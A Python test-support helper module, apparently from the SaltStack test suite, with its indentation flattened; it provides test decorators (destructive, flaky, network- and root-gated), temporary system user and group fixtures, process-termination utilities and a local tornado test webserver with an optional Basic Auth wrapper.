import tornado.ioloop
import tornado.web
import types
# Import 3rd-party libs
import psutil # pylint: disable=3rd-party-module-not-gated
from salt.ext import six
from salt.ext.six.moves import range, builtins # pylint: disable=import-error,redefined-builtin
try:
from pytestsalt.utils import get_unused_localhost_port # pylint: disable=unused-import
except ImportError:
def get_unused_localhost_port():
'''
Return a random unused port on localhost
'''
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.bind(('127.0.0.1', 0))
port = usock.getsockname()[1]
usock.close()
return port
# Import Salt Tests Support libs
from tests.support.unit import skip, _id
from tests.support.mock import patch
from tests.support.paths import FILES
log = logging.getLogger(__name__)
def destructiveTest(caller):
'''
Mark a test case as a destructive test, for example adding or removing users
from your system.
.. code-block:: python
class MyTestCase(TestCase):
@destructiveTest
def test_create_user(self):
pass
'''
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if os.environ.get('DESTRUCTIVE_TESTS', 'False').lower() == 'false':
self.skipTest('Destructive tests are disabled')
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get('DESTRUCTIVE_TESTS', 'False').lower() == 'false':
cls.skipTest('Destructive tests are disabled')
return caller(cls)
return wrap
def expensiveTest(caller):
'''
Mark a test case as an expensive test, for example, a test which can cost
money (Salt's cloud provider tests).
.. code-block:: python
class MyTestCase(TestCase):
@expensiveTest
def test_create_user(self):
pass
'''
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if os.environ.get('EXPENSIVE_TESTS', 'False').lower() == 'false':
self.skipTest('Expensive tests are disabled')
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get('EXPENSIVE_TESTS', 'False').lower() == 'false':
cls.skipTest('Expensive tests are disabled')
return caller(cls)
return wrap
def flaky(caller=None, condition=True):
'''
Mark a test as flaky. The test will attempt to run five times,
looking for a successful run. After an immediate second try, it will back
off with an increasing (quadratic) delay starting at one second.
.. code-block:: python
class MyTestCase(TestCase):
@flaky
def test_sometimes_works(self):
pass
'''
if caller is None:
return functools.partial(flaky, condition=condition)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith('test_')]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(caller, attrname, flaky(caller=function, condition=condition))
except Exception as exc:
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
for attempt in range(0, 5):  # five attempts, matching the docstring
try:
return caller(cls)
except Exception as exc:
if attempt == 4:
raise exc
backoff_time = attempt ** 2
log.info('Found Exception. Waiting %s seconds to retry.', backoff_time)
time.sleep(backoff_time)
return cls
return wrap
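# Usage sketch: ``flaky`` also works as a decorator factory, so a test can be
# marked flaky only under some condition (the platform check below is just an
# illustrative assumption).
#
#   class MyTestCase(TestCase):
#       @flaky(condition=lambda: sys.platform.startswith('win'))
#       def test_sometimes_works_on_windows(self):
#           pass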
def requires_sshd_server(caller):
'''
Mark a test as requiring the test suite's SSH daemon to be running.
.. code-block:: python
class MyTestCase(TestCase):
@requires_sshd_server
def test_create_user(self):
pass
'''
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if os.environ.get('SSH_DAEMON_RUNNING', 'False').lower() == 'false':
self.skipTest('SSH tests are disabled')
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrap(cls):
if os.environ.get('SSH_DAEMON_RUNNING', 'False').lower() == 'false':
cls.skipTest('SSH tests are disabled')
return caller(cls)
return wrap
class RedirectStdStreams(object):
'''
Temporarily redirect system output to file-like objects.
By default, both `stdout` and `stderr` are redirected to `os.devnull`,
which simply mutes the output.
'''
def __init__(self, stdout=None, stderr=None):
# Late import
import salt.utils.files
if stdout is None:
stdout = salt.utils.files.fopen(os.devnull, 'w') # pylint: disable=resource-leakage
if stderr is None:
stderr = salt.utils.files.fopen(os.devnull, 'w') # pylint: disable=resource-leakage
self.__stdout = stdout
self.__stderr = stderr
self.__redirected = False
self.patcher = patch.multiple(sys, stderr=self.__stderr, stdout=self.__stdout)
def __enter__(self):
self.redirect()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.unredirect()
def redirect(self):
self.old_stdout = sys.stdout
self.old_stdout.flush()
self.old_stderr = sys.stderr
self.old_stderr.flush()
self.patcher.start()
self.__redirected = True
def unredirect(self):
if not self.__redirected:
return
try:
self.__stdout.flush()
self.__stdout.close()
except ValueError:
# already closed?
pass
try:
self.__stderr.flush()
self.__stderr.close()
except ValueError:
# already closed?
pass
self.patcher.stop()
def flush(self):
if self.__redirected:
try:
self.__stdout.flush()
except Exception:
pass
try:
self.__stderr.flush()
except Exception:
pass
class TestsLoggingHandler(object):
'''
Simple logging handler which can be used to test if certain logging
messages get emitted or not:
.. code-block:: python
with TestsLoggingHandler() as handler:
# (...) Do whatever you wish here
handler.messages # here are the emitted log messages
'''
def __init__(self, level=0, format='%(levelname)s:%(message)s'):
self.level = level
self.format = format
self.activated = False
self.prev_logging_level = None
def activate(self):
class Handler(logging.Handler):
def __init__(self, level):
logging.Handler.__init__(self, level)
self.messages = []
def emit(self, record):
self.messages.append(self.format(record))
self.handler = Handler(self.level)
formatter = logging.Formatter(self.format)
self.handler.setFormatter(formatter)
logging.root.addHandler(self.handler)
self.activated = True
# Make sure we're running with the lowest logging level with our
# tests logging handler
current_logging_level = logging.root.getEffectiveLevel()
if current_logging_level > logging.DEBUG:
self.prev_logging_level = current_logging_level
logging.root.setLevel(0)
def deactivate(self):
if not self.activated:
return
logging.root.removeHandler(self.handler)
# Restore previous logging level if changed
if self.prev_logging_level is not None:
logging.root.setLevel(self.prev_logging_level)
@property
def messages(self):
if not self.activated:
return []
return self.handler.messages
def clear(self):
self.handler.messages = []
def __enter__(self):
self.activate()
return self
def __exit__(self, type, value, traceback):
self.deactivate()
self.activated = False
# Mimic some handler attributes and methods
@property
def lock(self):
if self.activated:
return self.handler.lock
def createLock(self):
if self.activated:
return self.handler.createLock()
def acquire(self):
if self.activated:
return self.handler.acquire()
def release(self):
if self.activated:
return self.handler.release()
def relative_import(import_name, relative_from='../'):
'''
Update sys.path to include `relative_from` before importing `import_name`
'''
try:
return __import__(import_name)
except ImportError:
previous_frame = inspect.getframeinfo(inspect.currentframe().f_back)
sys.path.insert(
0, os.path.realpath(
os.path.join(
os.path.abspath(
os.path.dirname(previous_frame.filename)
),
relative_from
)
)
)
return __import__(import_name)
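# Usage sketch (``mymodule`` is a hypothetical name): from a test file living
# under ``tests/``, this imports a module that sits one directory above it
# without requiring a package-relative import.
#
#   mymodule = relative_import('mymodule', relative_from='../')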
class ForceImportErrorOn(object):
'''
This class is meant to be used in mock'ed test cases which require an
``ImportError`` to be raised.
>>> import os.path
>>> with ForceImportErrorOn('os.path'):
... import os.path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 263, in __import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
>>> with ForceImportErrorOn(('os', 'path')):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
<module 'os' from '/usr/lib/python2.7/os.pyc'>
Traceback (most recent call last):
File "<stdin>", line 4, in <module>
File "salttesting/helpers.py", line 288, in __fake_import__
name, ', '.join(fromlist)
ImportError: Forced ImportError raised for 'from os import path'
>>>
>>> with ForceImportErrorOn(('os', 'path'), 'os.path'):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 281, in __fake_import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
'''
def __init__(self, *module_names):
self.__module_names = {}
for entry in module_names:
if isinstance(entry, (list, tuple)):
modname = entry[0]
self.__module_names[modname] = set(entry[1:])
else:
self.__module_names[entry] = None
self.__original_import = builtins.__import__
self.patcher = patch.object(builtins, '__import__', self.__fake_import__)
def patch_import_function(self):
self.patcher.start()
def restore_import_function(self):
self.patcher.stop()
def __fake_import__(self,
name,
globals_={} if six.PY2 else None,
locals_={} if six.PY2 else None,
fromlist=[] if six.PY2 else (),
level=-1 if six.PY2 else 0):
if name in self.__module_names:
importerror_fromlist = self.__module_names.get(name)
if importerror_fromlist is None:
raise ImportError(
'Forced ImportError raised for {0!r}'.format(name)
)
if importerror_fromlist.intersection(set(fromlist)):
raise ImportError(
'Forced ImportError raised for {0!r}'.format(
'from {0} import {1}'.format(
name, ', '.join(fromlist)
)
)
)
return self.__original_import(name, globals_, locals_, fromlist, level)
def __enter__(self):
self.patch_import_function()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.restore_import_function()
class MockWraps(object):
'''
Helper class to be used with the mock library.
To be used in the ``wraps`` keyword of ``Mock`` or ``MagicMock`` where you
want to trigger a side effect for X times, and afterwards, call the
original and un-mocked method.
As an example:
>>> def original():
... print 'original'
...
>>> def side_effect():
... print 'side effect'
...
>>> mw = MockWraps(original, 2, side_effect)
>>> mw()
side effect
>>> mw()
side effect
>>> mw()
original
>>>
'''
def __init__(self, original, expected_failures, side_effect):
self.__original = original
self.__expected_failures = expected_failures
self.__side_effect = side_effect
self.__call_counter = 0
def __call__(self, *args, **kwargs):
try:
if self.__call_counter < self.__expected_failures:
if isinstance(self.__side_effect, types.FunctionType):
return self.__side_effect()
raise self.__side_effect
return self.__original(*args, **kwargs)
finally:
self.__call_counter += 1
def requires_network(only_local_network=False):
'''
Simple decorator which skips a test case when there is no network
connection to the internet.
'''
def decorator(func):
@functools.wraps(func)
def wrapper(cls):
has_local_network = False
# First let's check whether we have a local network. Inspired by
# verify_socket
try:
pubsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(('', 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(('', 18001))
retsock.close()
has_local_network = True
except socket.error:
# I wonder if we just have IPV6 support?
try:
pubsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
pubsock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1
)
pubsock.bind(('', 18000))
pubsock.close()
retsock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1
)
retsock.bind(('', 18001))
retsock.close()
has_local_network = True
except socket.error:
# Let's continue
pass
if only_local_network is True:
if has_local_network is False:
# Since we're only supposed to check local network, and no
# local network was detected, skip the test
cls.skipTest('No local network was detected')
return func(cls)
# We are using the google.com DNS records as numerical IPs to avoid
# DNS lookups which could greatly slow down this check
for addr in ('173.194.41.198', '173.194.41.199', '173.194.41.200',
'173.194.41.201', '173.194.41.206', '173.194.41.192',
'173.194.41.193', '173.194.41.194', '173.194.41.195',
'173.194.41.196', '173.194.41.197'):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.settimeout(0.25)
sock.connect((addr, 80))
# We connected? Stop the loop
break
except socket.error:
# Let's check the next IP
continue
else:
cls.skipTest('No internet network connection was detected')
finally:
sock.close()
return func(cls)
return wrapper
return decorator
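# Usage sketch: note that ``requires_network`` is a decorator *factory* and
# must be called, even without arguments.
#
#   class MyTestCase(TestCase):
#       @requires_network()
#       def test_fetches_remote_data(self):
#           pass
#
#       @requires_network(only_local_network=True)
#       def test_binds_local_sockets(self):
#           pass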
def with_system_user(username, on_existing='delete', delete=True):
'''
Create and optionally destroy a system user to be used within a test
case. The system user is created using the ``user`` salt module.
The decorated testcase function must accept 'username' as an argument.
:param username: The desired username for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
'''
if on_existing not in ('nothing', 'delete', 'skip'):
raise RuntimeError(
'The value of \'on_existing\' can only be one of, '
'\'nothing\', \'delete\' and \'skip\''
)
if not isinstance(delete, bool):
raise RuntimeError(
'The value of \'delete\' can only be \'True\' or \'False\''
)
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug('Creating system user {0!r}'.format(username))
create_user = cls.run_function('user.add', [username])
if not create_user:
log.debug('Failed to create system user')
# The user was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system user {0!r}'.format(
username
)
)
if on_existing == 'delete':
log.debug(
'Deleting the system user {0!r}'.format(
username
)
)
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
if not delete_user:
cls.skipTest(
'A user named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(username)
)
log.debug(
'Second time creating system user {0!r}'.format(
username
)
)
create_user = cls.run_function('user.add', [username])
if not create_user:
cls.skipTest(
'A user named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(username)
)
failure = None
try:
try:
return func(cls, username)
except Exception as exc: # pylint: disable=W0703
log.error(
'Running {0!r} raised an exception: {1}'.format(
func, exc
),
exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
if not delete_user:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system user {0!r} '
'afterwards did.'.format(username)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system user {0!r}'.format(username)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
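# Usage sketch (the test case class and body are hypothetical): the decorated
# test receives the created username as an extra positional argument.
#
#   class MyTestCase(ModuleCase):
#       @with_system_user('issue-1234', on_existing='delete')
#       def test_user_ownership(self, username):
#           self.run_function('file.chown', ['/tmp/testfile', username])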
def with_system_group(group, on_existing='delete', delete=True):
'''
Create and optionally destroy a system group to be used within a test
case. The system group is created using the ``group`` salt module.
The decorated testcase function must accept 'group' as an argument.
:param group: The desired name for the system group.
:param on_existing: What to do when the desired group name is taken. The
available options are:
* nothing: Do nothing, act as if the group was created
* delete: delete and re-create the existing group
* skip: skip the test case
'''
if on_existing not in ('nothing', 'delete', 'skip'):
raise RuntimeError(
'The value of \'on_existing\' can only be one of, '
'\'nothing\', \'delete\' and \'skip\''
)
if not isinstance(delete, bool):
raise RuntimeError(
'The value of \'delete\' can only be \'True\' or \'False\''
)
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug('Creating system group {0!r}'.format(group))
create_group = cls.run_function('group.add', [group])
if not create_group:
log.debug('Failed to create system group')
# The group was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system group {0!r}'.format(group)
)
if on_existing == 'delete':
log.debug(
'Deleting the system group {0!r}'.format(group)
)
delete_group = cls.run_function('group.delete', [group])
if not delete_group:
cls.skipTest(
'A group named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(group)
)
log.debug(
'Second time creating system group {0!r}'.format(
group
)
)
create_group = cls.run_function('group.add', [group])
if not create_group:
cls.skipTest(
'A group named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(group)
)
failure = None
try:
try:
return func(cls, group)
except Exception as exc: # pylint: disable=W0703
log.error(
'Running {0!r} raised an exception: {1}'.format(
func, exc
),
exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_group = cls.run_function('group.delete', [group])
if not delete_group:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system group {0!r} '
'afterwards did.'.format(group)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system group {0!r}'.format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def with_system_user_and_group(username, group,
on_existing='delete', delete=True):
'''
Create and optionally destroy a system user and group to be used within a
test case. The system user is created using the ``user`` salt module, and
the system group is created with the ``group`` salt module.
The decorated testcase function must accept both the 'username' and 'group'
arguments.
:param username: The desired username for the system user.
:param group: The desired name for the system group.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
'''
if on_existing not in ('nothing', 'delete', 'skip'):
raise RuntimeError(
'The value of \'on_existing\' can only be one of, '
'\'nothing\', \'delete\' and \'skip\''
)
if not isinstance(delete, bool):
raise RuntimeError(
'The value of \'delete\' can only be \'True\' or \'False\''
)
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug('Creating system user {0!r}'.format(username))
create_user = cls.run_function('user.add', [username])
log.debug('Creating system group {0!r}'.format(group))
create_group = cls.run_function('group.add', [group])
if not create_user:
log.debug('Failed to create system user')
# The user was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system user {0!r}'.format(
username
)
)
if on_existing == 'delete':
log.debug(
'Deleting the system user {0!r}'.format(
username
)
)
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
if not delete_user:
cls.skipTest(
'A user named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(username)
)
log.debug(
'Second time creating system user {0!r}'.format(
username
)
)
create_user = cls.run_function('user.add', [username])
if not create_user:
cls.skipTest(
'A user named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(username)
)
if not create_group:
log.debug('Failed to create system group')
# The group was not created
if on_existing == 'skip':
cls.skipTest(
'Failed to create system group {0!r}'.format(group)
)
if on_existing == 'delete':
log.debug(
'Deleting the system group {0!r}'.format(group)
)
delete_group = cls.run_function('group.delete', [group])
if not delete_group:
cls.skipTest(
'A group named {0!r} already existed on the '
'system and re-creating it was not possible'
.format(group)
)
log.debug(
'Second time creating system group {0!r}'.format(
group
)
)
create_group = cls.run_function('group.add', [group])
if not create_group:
cls.skipTest(
'A group named {0!r} already existed, was deleted '
'as requested, but re-creating it was not possible'
.format(group)
)
failure = None
try:
try:
return func(cls, username, group)
except Exception as exc: # pylint: disable=W0703
log.error(
'Running {0!r} raised an exception: {1}'.format(
func, exc
),
exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
'user.delete', [username, True, True]
)
delete_group = cls.run_function('group.delete', [group])
if not delete_user:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system user {0!r} '
'afterwards did.'.format(username)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system user {0!r}'.format(username)
)
if not delete_group:
if failure is None:
log.warning(
'Although the actual test-case did not fail, '
'deleting the created system group {0!r} '
'afterwards did.'.format(group)
)
else:
log.warning(
'The test-case failed and also did the removal'
' of the system group {0!r}'.format(group)
)
if failure is not None:
# If an exception was thrown, raise it
six.reraise(failure[0], failure[1], failure[2])
return wrap
return decorator
def requires_system_grains(func):
'''
Function decorator which loads and passes the system's grains to the test
case.
'''
@functools.wraps(func)
def decorator(cls):
if not hasattr(cls, 'run_function'):
raise RuntimeError(
'{0} does not have the \'run_function\' method which is '
'necessary to collect the system grains'.format(
cls.__class__.__name__
)
)
return func(cls, grains=cls.run_function('grains.items'))
return decorator
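# Usage sketch: the decorated test must accept the loaded grains as a keyword
# argument named ``grains``.
#
#   class MyTestCase(ModuleCase):
#       @requires_system_grains
#       def test_only_on_linux(self, grains):
#           if grains['kernel'] != 'Linux':
#               self.skipTest('Linux-only test')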
def requires_salt_modules(*names):
'''
Makes sure the passed salt module is available. Skips the test if not
.. versionadded:: 0.5.2
'''
def decorator(caller):
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
if old_setup is not None:
old_setup(self, *args, **kwargs)
if not hasattr(self, 'run_function'):
raise RuntimeError(
'{0} does not have the \'run_function\' method which '
'is necessary to collect the loaded modules'.format(
self.__class__.__name__
)
)
not_found_modules = self.run_function('runtests_helpers.modules_available', names)
if not_found_modules:
if len(not_found_modules) == 1:
self.skipTest('Salt module {0!r} is not available'.format(not_found_modules[0]))
self.skipTest('Salt modules not available: {0!r}'.format(not_found_modules))
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrapper(cls):
if not hasattr(cls, 'run_function'):
raise RuntimeError(
'{0} does not have the \'run_function\' method which is '
'necessary to collect the loaded modules'.format(
cls.__class__.__name__
)
)
for name in names:
if name not in cls.run_function('sys.doc'):
cls.skipTest(
'Salt module {0!r} is not available'.format(name)
)
break
return caller(cls)
return wrapper
return decorator
def skip_if_binaries_missing(*binaries, **kwargs):
import salt.utils
import salt.utils.path
if len(binaries) == 1:
if isinstance(binaries[0], (list, tuple, set, frozenset)):
binaries = binaries[0]
check_all = kwargs.pop('check_all', False)
message = kwargs.pop('message', None)
if kwargs:
raise RuntimeError(
'The only supported keyword arguments are \'check_all\' and '
'\'message\'. Invalid keyword arguments: {0}'.format(
', '.join(kwargs.keys())
)
)
if check_all:
for binary in binaries:
if salt.utils.path.which(binary) is None:
return skip(
'{0}The {1!r} binary was not found'.format(
message and '{0}. '.format(message) or '',
binary
)
)
elif salt.utils.path.which_bin(binaries) is None:
return skip(
'{0}None of the following binaries was found: {1}'.format(
message and '{0}. '.format(message) or '',
', '.join(binaries)
)
)
return _id
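# Usage sketch: by default any one of the listed binaries satisfies the check;
# pass ``check_all=True`` to require every binary, and ``message`` to prefix
# the skip reason.
#
#   @skip_if_binaries_missing('svn', 'git',
#                             message='No supported VCS client found')
#   def test_vcs_checkout(self):
#       pass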
def skip_if_not_root(func):
if not sys.platform.startswith('win'):
if os.getuid() != 0:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = 'You must be logged in as root to run this test'
else:
import salt.utils.win_functions
current_user = salt.utils.win_functions.get_current_user()
if current_user != 'SYSTEM':
if not salt.utils.win_functions.is_admin(current_user):
func.__unittest_skip__ = True
func.__unittest_skip_why__ = 'You must be logged in as an Administrator to run this test'
return func
if sys.platform.startswith('win'):
SIGTERM = signal.CTRL_BREAK_EVENT # pylint: disable=no-member
else:
SIGTERM = signal.SIGTERM
def collect_child_processes(pid):
'''
Try to collect any started child processes of the provided pid
'''
# Let's get the child processes of the started subprocess
try:
parent = psutil.Process(pid)
if hasattr(parent, 'children'):
children = parent.children(recursive=True)
else:
children = []
except psutil.NoSuchProcess:
children = []
return children[::-1] # return a reversed list of the children
def _terminate_process_list(process_list, kill=False, slow_stop=False):
for process in process_list[:][::-1]: # Iterate over a reversed copy of the list
if not psutil.pid_exists(process.pid):
process_list.remove(process)
continue
try:
if not kill and process.status() == psutil.STATUS_ZOMBIE:
# Zombie processes will exit once child processes also exit
continue
try:
cmdline = process.cmdline()
except psutil.AccessDenied:
# OSX is more restrictive about the above information
cmdline = None
if not cmdline:
try:
cmdline = process.as_dict()
except Exception:
cmdline = 'UNKNOWN PROCESS'
if kill:
log.info('Killing process(%s): %s', process.pid, cmdline)
process.kill()
else:
log.info('Terminating process(%s): %s', process.pid, cmdline)
try:
if slow_stop:
# Allow coverage data to be written down to disk
process.send_signal(SIGTERM)
try:
process.wait(2)
except psutil.TimeoutExpired:
if psutil.pid_exists(process.pid):
continue
else:
process.terminate()
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
if not psutil.pid_exists(process.pid):
process_list.remove(process)
except psutil.NoSuchProcess:
process_list.remove(process)
def terminate_process_list(process_list, kill=False, slow_stop=False):
def on_process_terminated(proc):
log.info('Process %s terminated with exit code: %s', getattr(proc, '_cmdline', proc), proc.returncode)
# Try to terminate processes with the provided kill and slow_stop parameters
log.info('Terminating process list. 1st step. kill: %s, slow stop: %s', kill, slow_stop)
# Cache the cmdline since that will be inaccessible once the process is terminated
for proc in process_list:
try:
cmdline = proc.cmdline()
except (psutil.NoSuchProcess, psutil.AccessDenied):
# OSX is more restrictive about the above information
cmdline = None
if not cmdline:
try:
cmdline = proc.as_dict()
except (psutil.NoSuchProcess, psutil.AccessDenied):
cmdline = '<could not be retrieved; dead process: {0}>'.format(proc)
proc._cmdline = cmdline
_terminate_process_list(process_list, kill=kill, slow_stop=slow_stop)
psutil.wait_procs(process_list, timeout=15, callback=on_process_terminated)
if process_list:
# If there's still processes to be terminated, retry and kill them if slow_stop is False
log.info('Terminating process list. 2nd step. kill: %s, slow stop: %s', slow_stop is False, slow_stop)
_terminate_process_list(process_list, kill=slow_stop is False, slow_stop=slow_stop)
psutil.wait_procs(process_list, timeout=10, callback=on_process_terminated)
if process_list:
# If there's still processes to be terminated, just kill them, no slow stopping now
log.info('Terminating process list. 3rd step. kill: True, slow stop: False')
_terminate_process_list(process_list, kill=True, slow_stop=False)
psutil.wait_procs(process_list, timeout=5, callback=on_process_terminated)
if process_list:
# If there are still processes to be terminated, log a warning about it
log.warning('Some processes failed to properly terminate: %s', process_list)
def terminate_process(pid=None, process=None, children=None, kill_children=False, slow_stop=False):
'''
Try to terminate/kill the started process
'''
children = children or []
process_list = []
def on_process_terminated(proc):
if proc.returncode:
log.info('Process %s terminated with exit code: %s', getattr(proc, '_cmdline', proc), proc.returncode)
else:
log.info('Process %s terminated', getattr(proc, '_cmdline', proc))
if pid and not process:
try:
process = psutil.Process(pid)
process_list.append(process)
except psutil.NoSuchProcess:
# Process is already gone
process = None
if kill_children:
if process:
if not children:
children = collect_child_processes(process.pid)
else:
# Let's collect children again since there might be new ones
children.extend(collect_child_processes(pid))
if children:
process_list.extend(children)
if process_list:
if process:
log.info('Stopping process %s and respective children: %s', process, children)
else:
log.info('Terminating process list: %s', process_list)
terminate_process_list(process_list, kill=slow_stop is False, slow_stop=slow_stop)
if process and psutil.pid_exists(process.pid):
log.warning('Process left behind which we were unable to kill: %s', process)
def terminate_process_pid(pid, only_children=False):
children = []
process = None
# Let's begin the shutdown routines
try:
process = psutil.Process(pid)
children = collect_child_processes(pid)
except psutil.NoSuchProcess:
log.info('No process with the PID %s was found running', pid)
if only_children:
return terminate_process(children=children, kill_children=True, slow_stop=True)
return terminate_process(pid=pid, process=process, children=children, kill_children=True, slow_stop=True)
def repeat(caller=None, condition=True, times=5):
'''
Repeat a test X number of times, stopping at the first failure.
.. code-block:: python
class MyTestCase(TestCase):
@repeat
def test_sometimes_works(self):
pass
'''
if caller is None:
return functools.partial(repeat, condition=condition, times=times)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith('test_')]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(caller, attrname, repeat(caller=function, condition=condition, times=times))
except Exception as exc:
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
for attempt in range(1, times+1):
log.info('%s test run %d of %s times', cls, attempt, times)
caller(cls)
return cls
return wrap
def http_basic_auth(login_cb=lambda username, password: False):
'''
A crude decorator to force a handler to request HTTP Basic Authentication
Example usage:
.. code-block:: python
@http_basic_auth(lambda u, p: u == 'foo' and p == 'bar')
class AuthenticatedHandler(tornado.web.RequestHandler):
pass
'''
def wrapper(handler_class):
def wrap_execute(handler_execute):
def check_auth(handler, kwargs):
auth = handler.request.headers.get('Authorization')
if auth is None or not auth.startswith('Basic '):
# No username/password entered yet, we need to return a 401
# and set the WWW-Authenticate header to request login.
handler.set_status(401)
handler.set_header(
'WWW-Authenticate', 'Basic realm=Restricted')
else:
# Strip the 'Basic ' from the beginning of the auth header
# leaving the base64-encoded secret
secret = base64.b64decode(auth[6:])
if isinstance(secret, bytes):
# On Python 3, b64decode returns bytes; decode before splitting
secret = secret.decode('utf-8')
username, password = secret.split(':', 1)
if login_cb(username, password):
# Authentication successful
return
else:
# Authentication failed
handler.set_status(403)
handler._transforms = []
handler.finish()
def _execute(self, transforms, *args, **kwargs):
check_auth(self, kwargs)
return handler_execute(self, transforms, *args, **kwargs)
return _execute
handler_class._execute = wrap_execute(handler_class._execute)
return handler_class
return wrapper
def generate_random_name(prefix, size=6):
'''
Generates a random name by combining the provided prefix with a randomly generated
ascii string.
.. versionadded:: Oxygen
prefix
The string to prefix onto the randomly generated ascii string.
size
The number of characters to generate. Default: 6.
'''
return prefix + ''.join(
random.choice(string.ascii_uppercase + string.digits)
for x in range(size)
)
class Webserver(object):
'''
Starts a tornado webserver on 127.0.0.1 on a random available port
USAGE:
.. code-block:: python
from tests.support.helpers import Webserver
webserver = Webserver('/path/to/web/root')
webserver.start()
webserver.stop()
'''
def __init__(self,
root=None,
port=None,
wait=5,
handler=None):
'''
root
Root directory of webserver. If not passed, it will default to the
location of the base environment of the integration suite's file
roots (tests/integration/files/file/base/)
port
Port on which to listen. If not passed, a random one will be chosen
at the time the start() function is invoked.
wait : 5
Number of seconds to wait for the socket to be open before raising
an exception
handler
Can be used to use a subclass of tornado.web.StaticFileHandler,
such as when enforcing authentication with the http_basic_auth
decorator.
'''
if port is not None and not isinstance(port, six.integer_types):
raise ValueError('port must be an integer')
if root is None:
root = os.path.join(FILES, 'file', 'base')
try:
self.root = os.path.realpath(root)
except AttributeError:
raise ValueError('root must be a string')
self.port = port
self.wait = wait
self.handler = handler \
if handler is not None \
else tornado.web.StaticFileHandler
self.web_root = None
def target(self):
'''
Threading target which stands up the tornado application
'''
